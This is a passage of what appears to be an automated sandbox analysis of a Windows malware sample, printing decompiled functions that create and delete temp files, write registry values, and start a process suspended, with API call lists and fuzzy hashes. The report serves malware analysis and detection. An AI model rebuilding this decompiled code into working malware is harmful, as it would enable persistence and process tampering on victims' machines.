				void* _t16;
				int _t20;
				short* _t24;
				WCHAR* _t25;

				_t24 = __eax;
				_t7 = GetTempPathW(0x104, _t25);
				_t8 =  *0x1000e0ac; // 0x0
				_push(E1000391C(_t8) + _t9);
				_t11 =  *0x1000e0ac; // 0x0
				E100050D0(_t25 + 4 + _t7 * 2, E1000390C(_t11));
				_t16 = CreateFileW( &_v532, 0x40000000, 2, 0, 2, 0x80, 0); // executed
				CloseHandle(_t16);
				FindExecutableW( &_v532, 0, _t24); // executed
				_t20 = DeleteFileW(_t25); // executed
				return _t20;
			}

0x100054cc
0x100054d4
0x100054db
0x100054e7
0x100054e8
0x100054f9
0x10005515
0x1000551b
0x10005528
0x1000552e
0x1000553b

APIs

GetTempPathW.KERNEL32(00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000,00000000,00000000,HgDdsuTd), ref: 100054D4
CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000), ref: 10005515
CloseHandle.KERNEL32(00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 1000551B
FindExecutableW.SHELL32(?,00000000,?), ref: 10005528
DeleteFileW.KERNEL32(?,00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe), ref: 1000552E

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateDeleteExecutableFindHandlePathTemp
String ID:
API String ID: 3048815070-0
Opcode ID: 91bf4206e82319b8f66e9d503df7ed6300f54588c471e2c123916036fc16f990
Instruction ID: b8191a8fbfdb6de079f1d7f918beb96f752e281eea5dde0cd3b62906432631ca
Opcode Fuzzy Hash: 91bf4206e82319b8f66e9d503df7ed6300f54588c471e2c123916036fc16f990
Instruction Fuzzy Hash: 3BF030B96413147BF210E7B4EC87FDB369CDB407D0F214521B244EA1DAEEA1BD4486EA

Uniqueness

Uniqueness Score: -1.00%

Function 10005EB4, Relevance: 6.0, APIs: 4, Instructions: 48
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E10005EB4(WCHAR* __eax, void* __edx, long _a4, intOrPtr _a8) {
				long _v8;
				void* _t6;
				void* _t13;
				void* _t15;
				void* _t16;

				_t15 = __edx;
				_t13 = 0;
				_t6 = CreateFileW(__eax, 0x40000000, 2, 0, 2, 0, 0); // executed
				_t16 = _t6;
				if(_t16 != 0xffffffff) {
					if(_a8 == 0 && _a4 == 0xffffffff) {
						SetFilePointer(_t16, 0, 0, 0);
					}
					WriteFile(_t16, _t15, _a4,  &_v8, 0); // executed
					asm("sbb ebx, ebx");
					_t13 = _t13 + 1;
				}
				CloseHandle(_t16); // executed
				return _t13;
			}

0x10005ebb
0x10005ebd
0x10005ecf
0x10005ed4
0x10005ed9
0x10005edf
0x10005eee
0x10005eee
0x10005eff
0x10005f07
0x10005f09
0x10005f09
0x10005f0b
0x10005f17

APIs

CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,?,1000F834,?,?,?,1000BB19,00000004,00000000,00000002), ref: 10005ECF
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,?,1000F834,?), ref: 10005EEE
WriteFile.KERNEL32(00000000,1000BCB8,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,?,1000F834,?), ref: 10005EFF
CloseHandle.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,?,1000F834,?,?,?,1000BB19,00000004,00000000), ref: 10005F0B

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: 58547b8991d288027538c5d1d651dd5776961dce18e03299eac774a2063ccca9
Instruction ID: e4f3c4844a55c36be20b49d11d00148b33621b8e0b4bed1061d4f26ea208953b
Opcode Fuzzy Hash: 58547b8991d288027538c5d1d651dd5776961dce18e03299eac774a2063ccca9
Instruction Fuzzy Hash: 2CF0F6762413157DF620D965AC87F9B624CDB41BF5F214236F614A90C0CAA16E0582A9

Uniqueness

Uniqueness Score: -1.00%

Function 10006090, Relevance: 4.6, APIs: 3, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E10006090(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				void _v534;
				long _t28;
				intOrPtr* _t33;
				struct _ITEMIDLIST* _t37;
				int _t46;
				intOrPtr _t58;
				intOrPtr _t60;
				void* _t69;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t73 = _t74;
				_t75 = _t74 + 0xfffffdec;
				_v12 = 0;
				_t69 = __edx;
				_t46 = __eax;
				_push(_t73);
				_push(0x1000618b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t75;
				E100046DC( &_v12);
				E100050D8();
				_push(E100046DC( &_v12)); // executed
				L10006078(); // executed
				if(_v12 != 0) {
					_push(_t73);
					_push(0x1000616e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t75;
					_t28 = SHGetSpecialFolderLocation(0, _t46,  &_v8); // executed
					if(E1000606C(_t28) != 0) {
						_push( &_v534);
						_t37 = _v8;
						_push(_t37); // executed
						L10006088(); // executed
						asm("sbb eax, eax");
						if(_t37 + 1 == 0) {
							E100050D8();
						}
					}
					memcpy(_t69,  &_v534, 0x82 << 2);
					asm("movsw");
					_pop(_t58);
					 *[fs:eax] = _t58;
					_t33 = _v12;
					return  *((intOrPtr*)( *_t33 + 0x14))(_t33, _v8, E10006175);
				} else {
					memcpy(_t69,  &_v534, 0x82 << 2);
					asm("movsw");
					_pop(_t60);
					 *[fs:eax] = _t60;
					_push(E10006192);
					return E100046DC( &_v12);
				}
			}

0x10006091
0x10006093
0x1000609e
0x100060a1
0x100060a3
0x100060a7
0x100060a8
0x100060ad
0x100060b0
0x100060b6
0x100060c6
0x100060d3
0x100060d4
0x100060dd
0x100060f7
0x100060f8
0x100060fd
0x10006100
0x1000610a
0x10006116
0x1000611e
0x1000611f
0x10006122
0x10006123
0x1000612b
0x10006130
0x1000613d
0x1000613d
0x10006130
0x1000614f
0x10006151
0x10006155
0x10006158
0x10006164
0x1000616d
0x100060df
0x100060ec
0x100060ee
0x10006177
0x1000617a
0x1000617d
0x1000618a
0x1000618a

APIs

SHGetMalloc.SHELL32(00000000), ref: 100060D4
SHGetSpecialFolderLocation.SHELL32(00000000,0000001A,?,00000000,1000616E,?,00000000,1000618B,?,1000F834,1000F834,?,?,10005673,?,1000D2C2), ref: 1000610A
SHGetPathFromIDListW.SHELL32(?,?), ref: 10006123

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: FolderFromListLocationMallocPathSpecial
String ID:
API String ID: 628029987-0
Opcode ID: f6cc65bf62ea17e1061210d62eb0f9c292ca39f545557847811f4f652a5415d6
Instruction ID: f5f1894c3c3aa185a840a3eadd195327b621776b8329dab3f1fb33b6c646e1e3
Opcode Fuzzy Hash: f6cc65bf62ea17e1061210d62eb0f9c292ca39f545557847811f4f652a5415d6
Instruction Fuzzy Hash: C021AEB5904108AFEB11DAA4CC54ADF77BEEB4D380F6144B0B905E360ADA35AF19CA21

Uniqueness

Uniqueness Score: -1.00%

Function 1000577C, Relevance: 4.6, APIs: 3, Instructions: 61
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E1000577C(void* __eax, void* __ebx, char __ecx, char __edx, void* __esi, void* __eflags, int _a4, char _a8) {
				char _v8;
				char _v12;
				void* _v16;
				void* _t29;
				char* _t32;
				long _t37;
				intOrPtr _t52;
				void* _t55;
				void* _t58;

				_v12 = __ecx;
				_v8 = __edx;
				_t55 = __eax;
				E10003C28( &_v8);
				E10003C28( &_v12);
				E10003C28( &_a8);
				_push(_t58);
				_push(0x10005825);
				_push( *[fs:eax]);
				 *[fs:eax] = _t58 + 0xfffffff4;
				RegCreateKeyW(_t55, E1000390C(_v8),  &_v16); // executed
				_t29 = E1000391C(_a8);
				_t32 = E1000390C(_a8);
				_t37 = RegSetValueExW(_v16, E1000390C(_v12), 0, _a4, _t32, _t29 + _t29); // executed
				if(_t37 == 0) {
				}
				RegCloseKey(_v16); // executed
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E1000582C);
				E10003788( &_v12, 2);
				return E10003770( &_a8);
			}

0x10005784
0x10005787
0x1000578a
0x1000578f
0x10005797
0x1000579f
0x100057a6
0x100057a7
0x100057ac
0x100057af
0x100057c2
0x100057ca
0x100057d5
0x100057ee
0x100057f5
0x100057f5
0x100057fd
0x10005804
0x10005807
0x1000580a
0x10005817
0x10005824

APIs

Part of subcall function 10003C28: SysAllocStringLen.OLEAUT32(CONFIG,?), ref: 10003C36

RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 100057C2
RegSetValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057EE
RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057FD

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocCloseCreateStringValue
String ID:
API String ID: 2140091102-0
Opcode ID: 8386abb8985e96b7e742ca73356f96697864f8e82dd8d2b35a464892efa59d00
Instruction ID: 0dd5ed0a943e6cb984665ac1d2623c356232ef0b36590c9567a6f14ca7775770
Opcode Fuzzy Hash: 8386abb8985e96b7e742ca73356f96697864f8e82dd8d2b35a464892efa59d00
Instruction Fuzzy Hash: 3511DDB9904108BFE741DBA4DC42D9F77ECDF04290F518575B914E7215EB70AE109B50

Uniqueness

Uniqueness Score: -1.00%

Function 10003C28, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E10003C28(signed int __eax) {
				signed char _t15;
				void* _t17;
				void* _t21;

				_t4 = __eax;
				_t17 =  *__eax;
				if(_t17 == 0) {
					return __eax;
				} else {
					_push(__eax);
					_push( *(__edx - 4) >> 1);
					L10001128(); // executed
					__edx = __edx;
					if(__eax != 0) {
						 *__edx = __eax;
						return __eax;
					}
					__eax = __eax & 0x0000007f;
					__edx =  *__esp;
					_t21 = _t17;
					_t15 = _t4 & 0x0000007f;
					if( *0x1000f008 != 0) {
						 *0x1000f008();
					}
					if(_t15 != 0) {
						if(_t15 <= 0x18) {
							_t2 = _t15 + 0x1000e038; // 0xd7c9c8cc
							_t15 =  *_t2;
						}
					} else {
						_t15 =  *(E10004C98() + 4);
					}
					return E10002590(_t21);
				}
			}

0x10003c28
0x10003c28
0x10003c2c
0x10003c46
0x10003c2e
0x10003c2e
0x10003c34
0x10003c36
0x10003c3b
0x10003c3e
0x10003c44
0x00000000
0x10003c44
0x100025e8
0x100025eb
0x1000259e
0x100025a2
0x100025ac
0x100025b2
0x100025b2
0x100025ba
0x100025cc
0x100025d2
0x100025d2
0x100025d2
0x100025bc
0x100025c1
0x100025c1
0x100025e5
0x100025e5

APIs

SysAllocStringLen.OLEAUT32(CONFIG,?), ref: 10003C36

Strings

CONFIG, xrefs: 10003C35

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocString
String ID: CONFIG
API String ID: 2525500382-611510522
Opcode ID: 579fd664f3d77bebe830f344424d39ed6552b91152c30b79336f2dffc289d31d
Instruction ID: 25e1bc4a7362bba16a589b72a0d6fee5176ce5d44e135c61f892b3ac78b80433
Opcode Fuzzy Hash: 579fd664f3d77bebe830f344424d39ed6552b91152c30b79336f2dffc289d31d
Instruction Fuzzy Hash: B0D012F82045025A779DCE18896596BB3EFDBC25C1361C258A501DE14CDB31E841DB20

Uniqueness

Uniqueness Score: -1.00%

Function 10003158, Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E10003158() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x1000F64C != 0 ||  *0x1000f034 == 0) {
					L3:
					if( *0x1000e004 != 0) {
						E10003040();
						E100030CC(_t32);
						 *0x1000e004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x1000f64c)) == 2 &&  *0x1000e000 == 0) {
							 *0x1000F630 = 0;
						}
						E10002F24(); // executed
						if( *((char*)(0x1000f64c)) <= 1 ||  *0x1000e000 != 0) {
							_t14 =  *0x1000F634;
							if( *0x1000F634 != 0) {
								E1000466C(_t14);
								_t35 =  *((intOrPtr*)(0x1000f634));
								_t7 = _t35 + 0x10; // 0x0
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x10000000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E10002EFC();
						if( *((char*)(0x1000f64c)) == 1) {
							 *0x1000F648();
						}
						if( *((char*)(0x1000f64c)) != 0) {
							E1000309C();
						}
						if( *0x1000f624 == 0) {
							if( *0x1000f018 != 0) {
								 *0x1000f018();
							}
							ExitProcess( *0x1000e000); // executed
						}
						memcpy(0x1000f624,  *0x1000f624, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x1000e000 = 0x1000e000;
					}
				} else {
					do {
						 *0x1000f034 = 0;
						 *((intOrPtr*)( *0x1000f034))();
					} while ( *0x1000f034 != 0);
					goto L3;
				}
			}

0x1000316f
0x10003187
0x1000318e
0x10003190
0x10003195
0x1000319c
0x1000319c
0x00000000
0x100031a1
0x100031a5
0x100031ae
0x100031ae
0x100031b1
0x100031ba
0x100031c1
0x100031c6
0x100031c8
0x100031cd
0x100031d0
0x100031d0
0x100031d3
0x100031d6
0x100031dd
0x100031dd
0x100031d6
0x100031c6
0x100031e2
0x100031eb
0x100031ed
0x100031ed
0x100031f4
0x100031f6
0x100031f6
0x100031fe
0x10003207
0x10003209
0x10003209
0x10003212
0x10003212
0x10003223
0x10003223
0x10003225
0x10003225
0x10003176
0x10003176
0x1000317c
0x10003180
0x10003182
0x00000000
0x10003176

APIs

FreeLibrary.KERNEL32(10000000,?,?,?,00000002,1000323A,1000259B,100025E3,00000002,00000000,10002538,?,1000D702,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 100031DD
ExitProcess.KERNEL32(00000000,?,?,?,00000002,1000323A,1000259B,100025E3,00000002,00000000,10002538,?,1000D702,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 10003212

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: a7d26fcc6f4fce9ecc30ffe483834d278041aa4daacdb7ce10931836dbac7f8e
Instruction ID: 102873f78adbb93bbd2a11590cb18782e29a3d6c26b998e20b0a0626f3baee5f
Opcode Fuzzy Hash: a7d26fcc6f4fce9ecc30ffe483834d278041aa4daacdb7ce10931836dbac7f8e
Instruction Fuzzy Hash: 132148B49002819BFB52DB64C48879677EDEB093D0F26C569D8448B18ED775DCC4C791

Uniqueness

Uniqueness Score: -1.00%

Function 10003150, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E10003150() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x1000F64C != 0 ||  *0x1000f034 == 0) {
					L5:
					if( *0x1000e004 != 0) {
						E10003040();
						E100030CC(_t36);
						 *0x1000e004 = 0;
					}
					L7:
					if( *((char*)(0x1000f64c)) == 2 &&  *0x1000e000 == 0) {
						 *0x1000F630 = 0;
					}
					E10002F24(); // executed
					if( *((char*)(0x1000f64c)) <= 1 ||  *0x1000e000 != 0) {
						_t17 =  *0x1000F634;
						if( *0x1000F634 != 0) {
							E1000466C(_t17);
							_t39 =  *((intOrPtr*)(0x1000f634));
							_t7 = _t39 + 0x10; // 0x0
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x10000000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E10002EFC();
					if( *((char*)(0x1000f64c)) == 1) {
						 *0x1000F648();
					}
					if( *((char*)(0x1000f64c)) != 0) {
						E1000309C();
					}
					if( *0x1000f624 == 0) {
						if( *0x1000f018 != 0) {
							 *0x1000f018();
						}
						ExitProcess( *0x1000e000); // executed
					}
					memcpy(0x1000f624,  *0x1000f624, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x1000e000 = 0x1000e000;
					goto L7;
				} else {
					do {
						 *0x1000f034 = 0;
						 *((intOrPtr*)( *0x1000f034))();
					} while ( *0x1000f034 != 0);
					goto L5;
				}
			}

0x10003152
0x1000316f
0x10003187
0x1000318e
0x10003190
0x10003195
0x1000319c
0x1000319c
0x100031a1
0x100031a5
0x100031ae
0x100031ae
0x100031b1
0x100031ba
0x100031c1
0x100031c6
0x100031c8
0x100031cd
0x100031d0
0x100031d0
0x100031d3
0x100031d6
0x100031dd
0x100031dd
0x100031d6
0x100031c6
0x100031e2
0x100031eb
0x100031ed
0x100031ed
0x100031f4
0x100031f6
0x100031f6
0x100031fe
0x10003207
0x10003209
0x10003209
0x10003212
0x10003212
0x10003223
0x10003223
0x10003225
0x00000000
0x10003176
0x10003176
0x1000317c
0x10003180
0x10003182
0x00000000
0x10003176

APIs

FreeLibrary.KERNEL32(10000000,?,?,?,00000002,1000323A,1000259B,100025E3,00000002,00000000,10002538,?,1000D702,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 100031DD
ExitProcess.KERNEL32(00000000,?,?,?,00000002,1000323A,1000259B,100025E3,00000002,00000000,10002538,?,1000D702,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 10003212

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 0eb6f4655f148300ca2f24b40a13f7269e70753ec68d107d5bfe6d84152a04b1
Instruction ID: fe416cb812802e2425b92288dcf65fb30cec29a5b1ace6356a2caf233bfd9b77
Opcode Fuzzy Hash: 0eb6f4655f148300ca2f24b40a13f7269e70753ec68d107d5bfe6d84152a04b1
Instruction Fuzzy Hash: CA2157B49002819AFB52DB60C4887927BE9EF093D0F26C9A9D8448A18ED774DCC4CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10003154, Relevance: 3.1, APIs: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E10003154() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x1000F64C != 0 ||  *0x1000f034 == 0) {
					L4:
					if( *0x1000e004 != 0) {
						E10003040();
						E100030CC(_t35);
						 *0x1000e004 = 0;
					}
					L6:
					if( *((char*)(0x1000f64c)) == 2 &&  *0x1000e000 == 0) {
						 *0x1000F630 = 0;
					}
					E10002F24(); // executed
					if( *((char*)(0x1000f64c)) <= 1 ||  *0x1000e000 != 0) {
						_t16 =  *0x1000F634;
						if( *0x1000F634 != 0) {
							E1000466C(_t16);
							_t38 =  *((intOrPtr*)(0x1000f634));
							_t7 = _t38 + 0x10; // 0x0
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x10000000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E10002EFC();
					if( *((char*)(0x1000f64c)) == 1) {
						 *0x1000F648();
					}
					if( *((char*)(0x1000f64c)) != 0) {
						E1000309C();
					}
					if( *0x1000f624 == 0) {
						if( *0x1000f018 != 0) {
							 *0x1000f018();
						}
						ExitProcess( *0x1000e000); // executed
					}
					memcpy(0x1000f624,  *0x1000f624, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x1000e000 = 0x1000e000;
					goto L6;
				} else {
					do {
						 *0x1000f034 = 0;
						 *((intOrPtr*)( *0x1000f034))();
					} while ( *0x1000f034 != 0);
					goto L4;
				}
			}

0x1000316f
0x10003187
0x1000318e
0x10003190
0x10003195
0x1000319c
0x1000319c
0x100031a1
0x100031a5
0x100031ae
0x100031ae
0x100031b1
0x100031ba
0x100031c1
0x100031c6
0x100031c8
0x100031cd
0x100031d0
0x100031d0
0x100031d3
0x100031d6
0x100031dd
0x100031dd
0x100031d6
0x100031c6
0x100031e2
0x100031eb
0x100031ed
0x100031ed
0x100031f4
0x100031f6
0x100031f6
0x100031fe
0x10003207
0x10003209
0x10003209
0x10003212
0x10003212
0x10003223
0x10003223
0x10003225
0x00000000
0x10003176
0x10003176
0x1000317c
0x10003180
0x10003182
0x00000000
0x10003176

APIs

FreeLibrary.KERNEL32(10000000,?,?,?,00000002,1000323A,1000259B,100025E3,00000002,00000000,10002538,?,1000D702,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 100031DD
ExitProcess.KERNEL32(00000000,?,?,?,00000002,1000323A,1000259B,100025E3,00000002,00000000,10002538,?,1000D702,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 10003212

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: f029aa4d048ab71b3d48e2163f45d484fdec98b6e81d7e04a45f41dc6beeb9e9
Instruction ID: 0923f5ad4ec0768f18e91c29f3e5e862ef011e1a732e010652329f9221a0f365
Opcode Fuzzy Hash: f029aa4d048ab71b3d48e2163f45d484fdec98b6e81d7e04a45f41dc6beeb9e9
Instruction Fuzzy Hash: D7215BB49002819BFB52DF60C4887967BEDEF093D0F22C569D8448618ED775DCC4CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10009950, Relevance: 3.0, APIs: 2, Instructions: 38
sleepprocessCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E10009950(void* __eax) {
				struct _STARTUPINFOW _v80;
				struct _PROCESS_INFORMATION _v96;
				short _v620;
				int _t14;
				void* _t16;
				void* _t24;

				memcpy(_t24, __eax, 0x82 << 2);
				asm("movsw");
				_t16 = 0;
				E100050D8();
				_t14 = CreateProcessW(0,  &_v620, 0, 0, 0, 4, 0, 0,  &_v80,  &_v96); // executed
				if(_t14 != 0) {
					_t16 = _v96.hProcess;
					Sleep(0x64); // executed
				}
				return _t16;
			}

0x10009963
0x10009965
0x10009967
0x10009975
0x1000999d
0x100099a4
0x100099a6
0x100099af
0x100099af
0x100099bf

APIs

CreateProcessW.KERNEL32 ref: 1000999D
Sleep.KERNEL32(00000064,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,1000F834,1000F834,00000000,1000D68D,00000000), ref: 100099AF

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateProcessSleep
String ID:
API String ID: 3229676899-0
Opcode ID: bca0b144e135752a1d5e6e13312447c91aa1364c1872f8c890ab86c12d918bbf
Instruction ID: 37df1048d1a9e356d2120e553cad0eb1a5fc8c22ebf76e4491bd2cded27ec310
Opcode Fuzzy Hash: bca0b144e135752a1d5e6e13312447c91aa1364c1872f8c890ab86c12d918bbf
Instruction Fuzzy Hash: 05F089B63843442BF330D694DC86FEB739CEB84790F110539BB88DA1C1DAB5A91583B6

Uniqueness

Uniqueness Score: -1.00%

Function 1000A2F4, Relevance: 3.0, APIs: 2, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E1000A2F4() {
				void* _t1;
				int _t2;

				_push(0x1000f7f4);
				L10004E28();
				_t1 =  *0x1000f7f0; // 0x204
				_t2 = CloseHandle(_t1); // executed
				return _t2;
			}

0x1000a2f4
0x1000a2f9
0x1000a2fe
0x1000a304
0x1000a309

APIs

RtlDeleteCriticalSection.KERNEL32(1000F7F4,1000A4BE,00000000,1000A4CC), ref: 1000A2F9
CloseHandle.KERNEL32(00000204,1000F7F4,1000A4BE,00000000,1000A4CC), ref: 1000A304

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
